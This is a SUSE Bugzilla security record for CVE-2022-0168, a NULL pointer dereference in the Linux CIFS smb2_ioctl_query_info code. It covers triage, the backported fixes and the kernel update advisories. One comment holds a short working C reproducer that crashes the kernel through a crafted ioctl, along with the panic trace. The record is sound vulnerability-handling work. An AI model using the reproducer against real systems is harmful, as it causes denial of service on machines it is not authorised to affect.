Bug 1197472 - (CVE-2022-0168) VUL-1: CVE-2022-0168: kernel-source,kernel-source-rt,kernel-source-azure: smb2_ioctl_query_info NULL Pointer Dereference
(CVE-2022-0168)
VUL-1: CVE-2022-0168: kernel-source,kernel-source-rt,kernel-source-azure: smb...
Status: NEW
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/327008/
CVSSv3.1:SUSE:CVE-2022-0168:4.4:(AV:L...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2022-03-24 10:57 UTC by Thomas Leroy
Modified: 2022-07-21 20:36 UTC (History)
9 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Thomas Leroy 2022-03-24 10:57:31 UTC
rh#2037386

In Function `smb2_ioctl_query_info`, it incorrectly verify the return from the `memdup_user` function. `qi.output_buffer_length` is grab from copy_from_user which is user control value. If qi.output_buffer_length is equal to zero, the `memdup_user` function returns `0x10` which is not a valid ptr but can pass the check. Later this evil `buffer` is pass to function `SMB2_set_info_init` if qi.flags is equal to `PASSTHRU_SET_INFO`. In function `SMB2_set_info_init`, there is a straight memcpy which `*data` is previous evil buffer and `*size` is 8.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2037386
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0168
Comment 1 Thomas Leroy 2022-03-24 11:01:20 UTC
No upstream fix yet.

This commit probably introduced the bug:
https://github.com/torvalds/linux/commit/cfaa1181097f6a1a6f4f6670ebc97848efda0883
(CIFS: Use memdup_user() rather than duplicating its implementation)

I think the kmalloc + copy_from_user prior to memdup_user use was safe.

If the commit mentioned above is the correct one that introduced the bug, we have the following branches affected:
- SLE15-SP3
- SLE15-SP4-GA
- cve/linux-5.3
- stable
Comment 2 Paulo Alcantara 2022-03-24 12:34:52 UTC
(In reply to Thomas Leroy from comment #0)
> rh#2037386
> 
> In Function `smb2_ioctl_query_info`, it incorrectly verify the return from
> the `memdup_user` function. `qi.output_buffer_length` is grab from
> copy_from_user which is user control value. If qi.output_buffer_length is
> equal to zero, the `memdup_user` function returns `0x10` which is not a
> valid ptr but can pass the check. Later this evil `buffer` is pass to
> function `SMB2_set_info_init` if qi.flags is equal to `PASSTHRU_SET_INFO`.
> In function `SMB2_set_info_init`, there is a straight memcpy which `*data`
> is previous evil buffer and `*size` is 8.
> 
> References:
> https://bugzilla.redhat.com/show_bug.cgi?id=2037386
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0168

Thanks for the report!  Yes, that is very serious bug.

Since I could access the RH bug report, should I assume it is public and not embargoed, right?
Comment 3 Paulo Alcantara 2022-03-24 12:37:42 UTC
(In reply to Thomas Leroy from comment #1)
> No upstream fix yet.

There is a suggested change[1] to fix this issue.  If you could confirm it is public, then I can prepare a formal patch for that.

> This commit probably introduced the bug:
> https://github.com/torvalds/linux/commit/
> cfaa1181097f6a1a6f4f6670ebc97848efda0883
> (CIFS: Use memdup_user() rather than duplicating its implementation)

Yes.

> I think the kmalloc + copy_from_user prior to memdup_user use was safe.

Yes.

> If the commit mentioned above is the correct one that introduced the bug, we
> have the following branches affected:
> - SLE15-SP3
> - SLE15-SP4-GA
> - cve/linux-5.3
> - stable

[1] https://bugzilla.redhat.com/show_bug.cgi?id=2037386#c6
Comment 4 Thomas Leroy 2022-03-24 13:20:59 UTC
(In reply to Paulo Alcantara from comment #2)
> Since I could access the RH bug report, should I assume it is public and not
> embargoed, right?

Yes this is a public issue. Every bug we open coming from RH bugzilla is public ;)

> There is a suggested change[1] to fix this issue.  If you could confirm it
> is public, then I can prepare a formal patch for that.

The fact that there is still nothing upstream, even though we have a suggested fix, could mean that it is not very urgent for upstream...

Anyway, thanks for your efforts Paulo!
Comment 5 Paulo Alcantara 2022-03-24 17:03:00 UTC
(In reply to Thomas Leroy from comment #4)
> (In reply to Paulo Alcantara from comment #2)
> > Since I could access the RH bug report, should I assume it is public and not
> > embargoed, right?
> 
> Yes this is a public issue. Every bug we open coming from RH bugzilla is
> public ;)
> 
> > There is a suggested change[1] to fix this issue.  If you could confirm it
> > is public, then I can prepare a formal patch for that.
> 
> The fact that there is still nothing upstream, even though we have a
> suggested fix, could mean that it is not very urgent for upstream...
> 
> Anyway, thanks for your efforts Paulo!

Thanks Thomas!

I've got a small C reproducer for this issue:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

#define die(s) perror(s), exit(1)
#define QUERY_INFO 0xc018cf07

int main(int argc, char *argv[])
{
	int fd;

	if (argc < 2)
		exit(1);
	fd = open(argv[1], O_RDONLY);
	if (fd == -1)
		die("open");
	if (ioctl(fd, QUERY_INFO, (uint32_t[]) { 0, 0, 0, 4, 0, 0 }) == -1)
		die("ioctl");
	close(fd);
	return 0;
}

which indeed triggers the following NULL ptr deference:

[..]
[  114.138620] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN NOPTI                                                                                                                                                             
[  114.139310] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]                                                                                                                                                                                                         
[  114.139775] CPU: 2 PID: 995 Comm: a.out Not tainted 5.17.0-rc8 #1                                                                                                                                                                                                                          
[  114.140148] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-0-g2dd4b9b-rebuilt.opensuse.org 04/01/2014                                                                                                                                                                 
[  114.140818] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs]                                                                                                                                                                                                                             
[  114.141221] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24                                                                        
[  114.142348] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256                                                                                                                                                                                                                                    
[  114.142692] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d                                                                                                                                                                                                              
[  114.143119] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380                                                               
[  114.143544] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003                                                               
[  114.143983] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288                                                               
[  114.144424] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000                                                               
[  114.144852] FS:  00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000                                                                                                                                                                                                   
[  114.145338] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033                                                                               
[  114.145692] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0                                                               
[  114.146131] Call Trace:                                             
[  114.146291]  <TASK>                                                 
[  114.146432]  ? smb2_query_reparse_tag+0x890/0x890 [cifs]                                                                                    
[  114.146800]  ? cifs_mapchar+0x460/0x460 [cifs]                                                                                              
[  114.147121]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.147412]  ? cifs_strndup_to_utf16+0x15b/0x250 [cifs]                                                                                     
[  114.147775]  ? dentry_path_raw+0xa6/0xf0                                                                                                    
[  114.148024]  ? cifs_convert_path_to_utf16+0x198/0x220 [cifs]                                                                                
[  114.148413]  ? smb2_check_message+0x1080/0x1080 [cifs]                                                                                      
[  114.148766]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.149065]  cifs_ioctl+0x1577/0x3320 [cifs]                                                                                                
[  114.149371]  ? lock_downgrade+0x6f0/0x6f0                                                                                                   
[  114.149631]  ? cifs_readdir+0x2e60/0x2e60 [cifs]                                                                                            
[  114.149956]  ? rcu_read_lock_sched_held+0x3f/0x70                                                                                           
[  114.150250]  ? __rseq_handle_notify_resume+0x80b/0xbe0                                                                                      
[  114.150562]  ? __up_read+0x192/0x710                                
[  114.150791]  ? __ia32_sys_rseq+0xf0/0xf0                                                                                                    
[  114.151025]  ? __x64_sys_openat+0x11f/0x1d0                                                                                                 
[  114.151296]  __x64_sys_ioctl+0x127/0x190                                                                                                    
[  114.151549]  do_syscall_64+0x3b/0x90                                
[  114.151768]  entry_SYSCALL_64_after_hwframe+0x44/0xae                                                                                       
[  114.152079] RIP: 0033:0x7f7aead043df                                
[  114.152306] Code: 00 48 89 44 24 18 31 c0 48 8d 44 24 60 c7 04 24 10 00 00 00 48 89 44 24 08 48 8d 44 24 20 48 89 44 24 10 b8 10 00 00 00 0f 05 <41> 89 c0 3d 00 f0 ff ff 77 1f 48 8b 44 24 18 64 48 2b 04 25 28 00
[  114.153431] RSP: 002b:00007ffc2e0c1f80 EFLAGS: 00000246 ORIG_RAX: 0000000000000010                                                                                                                                                                                                         
[  114.153890] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f7aead043df                                                               
[  114.154315] RDX: 00007ffc2e0c1ff0 RSI: 00000000c018cf07 RDI: 0000000000000003                                                               
[  114.154747] RBP: 00007ffc2e0c2010 R08: 00007f7aeae03db0 R09: 00007f7aeae24c4e                                                               
[  114.155192] R10: 00007f7aeabf7d40 R11: 0000000000000246 R12: 00007ffc2e0c2128                                                               
[  114.155642] R13: 0000000000401176 R14: 0000000000403df8 R15: 00007f7aeae57000                                                               
[  114.156071]  </TASK>                                                
[  114.156218] Modules linked in: cifs cifs_arc4 cifs_md4 bpf_preload                                                                          
[  114.156608] ---[ end trace 0000000000000000 ]---                                                                                            
[  114.156898] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs]                                                                              
[  114.157792] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24
[  114.159293] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256                                                                                     
[  114.159641] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d                                                               
[  114.160093] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380                                                               
[  114.160699] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003                                                               
[  114.161196] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288
[  114.155642] R13: 0000000000401176 R14: 0000000000403df8 R15: 00007f7aeae57000
[  114.156071]  </TASK>
[  114.156218] Modules linked in: cifs cifs_arc4 cifs_md4 bpf_preload
[  114.156608] ---[ end trace 0000000000000000 ]---
[  114.156898] RIP: 0010:smb2_ioctl_query_info+0x206/0x410 [cifs]
[  114.157792] Code: 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02 00 0f 85 c8 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 7b 28 4c 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 9c 01 00 00 49 8b 3f e8 58 02 fb ff 48 8b 14 24
[  114.159293] RSP: 0018:ffffc90000b47b00 EFLAGS: 00010256
[  114.159641] RAX: dffffc0000000000 RBX: ffff888115503200 RCX: ffffffffa020580d
[  114.160093] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffffa043a380
[  114.160699] RBP: ffff888115503278 R08: 0000000000000001 R09: 0000000000000003
[  114.161196] R10: fffffbfff4087470 R11: 0000000000000001 R12: ffff888115503288
[  114.161823] R13: 00000000ffffffea R14: ffff888115503228 R15: 0000000000000000
[  114.162274] FS:  00007f7aeabdf740(0000) GS:ffff888151600000(0000) knlGS:0000000000000000
[  114.162853] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  114.163218] CR2: 00007f7aeacfdf5e CR3: 000000012000e000 CR4: 0000000000350ee0
[  114.163691] Kernel panic - not syncing: Fatal exception
[  114.164087] Kernel Offset: disabled
[  114.164316] ---[ end Kernel panic - not syncing: Fatal exception ]---


I'll send a patch upstream for this along with a memory leak fix I've just found while looking into that code.
Comment 9 Petr Mladek 2022-05-06 11:48:04 UTC
This bug seems to approach a good date for CVE SLA fulfillment [1].
What is its status, please?
 
[1] https://confluence.suse.com/display/KSS/Kernel+Security+Sentinel
Comment 11 Paulo Alcantara 2022-05-06 13:45:33 UTC
(In reply to Petr Mladek from comment #9)
> This bug seems to approach a good date for CVE SLA fulfillment [1].
> What is its status, please?
>  
> [1] https://confluence.suse.com/display/KSS/Kernel+Security+Sentinel

I need to confirm whether CVE-2022-0168 is the correct one, then I'll backport the patches to the affected SLES branches.
Comment 12 Marcus Meissner 2022-05-06 15:48:26 UTC
The CVE was likely assigned by red hat and is used in their bugzilla, so it can be used here too.
Comment 13 Paulo Alcantara 2022-05-06 15:51:33 UTC
(In reply to Marcus Meissner from comment #12)
> The CVE was likely assigned by red hat and is used in their bugzilla, so it
> can be used here too.

Thx - will work on the backports.
Comment 14 Paulo Alcantara 2022-05-06 17:32:52 UTC
Pushed for-next branches with those commits backported:

  origin/users/palcantara/cve/linux-5.3/for-next
  origin/users/palcantara/SLE15-SP4-GA/for-next

origin/stable already has them.
Comment 16 Paulo Alcantara 2022-05-11 21:22:05 UTC
Fixes have been backported.  Reassigning to security team for closing it.
Comment 25 Swamp Workflow Management 2022-06-14 22:31:50 UTC
SUSE-SU-2022:2079-1: An update that solves 15 vulnerabilities, contains two features and has 36 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1152472,1152489,1153274,1154353,1156395,1158266,1167773,1176447,1178134,1180100,1183405,1188885,1195612,1195651,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198534,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200019,1200045,1200046,1200192,1200216
CVE References: CVE-2019-19377,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1972,CVE-2022-20008,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-24448,CVE-2022-30594
JIRA References: SLE-13521,SLE-16387
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.59.1, kernel-source-azure-5.3.18-150300.38.59.1, kernel-syms-azure-5.3.18-150300.38.59.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.59.1, kernel-source-azure-5.3.18-150300.38.59.1, kernel-syms-azure-5.3.18-150300.38.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Swamp Workflow Management 2022-06-14 22:36:46 UTC
SUSE-SU-2022:2078-1: An update that solves 14 vulnerabilities, contains two features and has 32 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1153274,1154353,1156395,1158266,1167773,1176447,1178134,1180100,1183405,1188885,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200019,1200045,1200046,1200192,1200216
CVE References: CVE-2019-19377,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1972,CVE-2022-20008,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-30594
JIRA References: SLE-13521,SLE-16387
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.71.1, kernel-preempt-5.3.18-150300.59.71.2
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.71.1, kernel-64kb-5.3.18-150300.59.71.2, kernel-debug-5.3.18-150300.59.71.2, kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2, kernel-docs-5.3.18-150300.59.71.2, kernel-kvmsmall-5.3.18-150300.59.71.2, kernel-obs-build-5.3.18-150300.59.71.2, kernel-obs-qa-5.3.18-150300.59.71.1, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-syms-5.3.18-150300.59.71.1, kernel-zfcpdump-5.3.18-150300.59.71.2
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-preempt-5.3.18-150300.59.71.2
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-livepatch-SLE15-SP3_Update_19-1-150300.7.3.2
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.71.2, kernel-obs-build-5.3.18-150300.59.71.2, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-syms-5.3.18-150300.59.71.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.71.2, kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2, kernel-preempt-5.3.18-150300.59.71.2, kernel-source-5.3.18-150300.59.71.2, kernel-zfcpdump-5.3.18-150300.59.71.2
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.71.2, kernel-default-base-5.3.18-150300.59.71.2.150300.18.43.2
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.71.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 27 Swamp Workflow Management 2022-06-16 19:27:52 UTC
SUSE-SU-2022:2104-1: An update that solves 23 vulnerabilities, contains one feature and has 19 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1158266,1177282,1191647,1195651,1195926,1196114,1196367,1196426,1196433,1196514,1196570,1196942,1197157,1197343,1197472,1197656,1197660,1197895,1198330,1198400,1198484,1198516,1198577,1198660,1198687,1198778,1198825,1199012,1199063,1199314,1199505,1199507,1199605,1199650,1199918,1200015,1200143,1200144,1200249
CVE References: CVE-2019-19377,CVE-2020-26541,CVE-2021-20321,CVE-2021-33061,CVE-2022-0168,CVE-2022-1011,CVE-2022-1158,CVE-2022-1184,CVE-2022-1353,CVE-2022-1516,CVE-2022-1652,CVE-2022-1729,CVE-2022-1734,CVE-2022-1966,CVE-2022-1974,CVE-2022-1975,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-28893,CVE-2022-30594
JIRA References: SLE-18234
Sources used:
SUSE Manager Server 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Manager Retail Branch Server 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Manager Proxy 4.1 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise Module for Live Patching 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-livepatch-SLE15-SP2_Update_27-1-150200.5.3.1
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1
SUSE Linux Enterprise High Availability 15-SP2 (src):    kernel-default-5.3.18-150200.24.115.1
SUSE Enterprise Storage 7 (src):    kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Swamp Workflow Management 2022-06-24 16:22:46 UTC
SUSE-SU-2022:2177-1: An update that solves 20 vulnerabilities, contains three features and has 39 fixes is now available.

Category: security (important)
Bug References: 1055117,1061840,1065729,1103269,1118212,1153274,1154353,1156395,1158266,1167773,1176447,1177282,1178134,1180100,1183405,1188885,1195826,1196426,1196478,1196570,1196840,1197446,1197472,1197601,1197675,1198438,1198577,1198971,1198989,1199035,1199052,1199063,1199114,1199314,1199365,1199505,1199507,1199564,1199626,1199631,1199650,1199670,1199839,1200015,1200019,1200045,1200046,1200143,1200144,1200192,1200206,1200207,1200216,1200249,1200259,1200263,1200529,1200549,1200604
CVE References: CVE-2019-19377,CVE-2020-26541,CVE-2021-33061,CVE-2022-0168,CVE-2022-1184,CVE-2022-1652,CVE-2022-1729,CVE-2022-1966,CVE-2022-1972,CVE-2022-1974,CVE-2022-1975,CVE-2022-20008,CVE-2022-20141,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-30594,CVE-2022-32250
JIRA References: SLE-13521,SLE-16387,SLE-8371
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.93.1, kernel-rt_debug-5.3.18-150300.93.1, kernel-source-rt-5.3.18-150300.93.1, kernel-syms-rt-5.3.18-150300.93.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.93.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.93.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.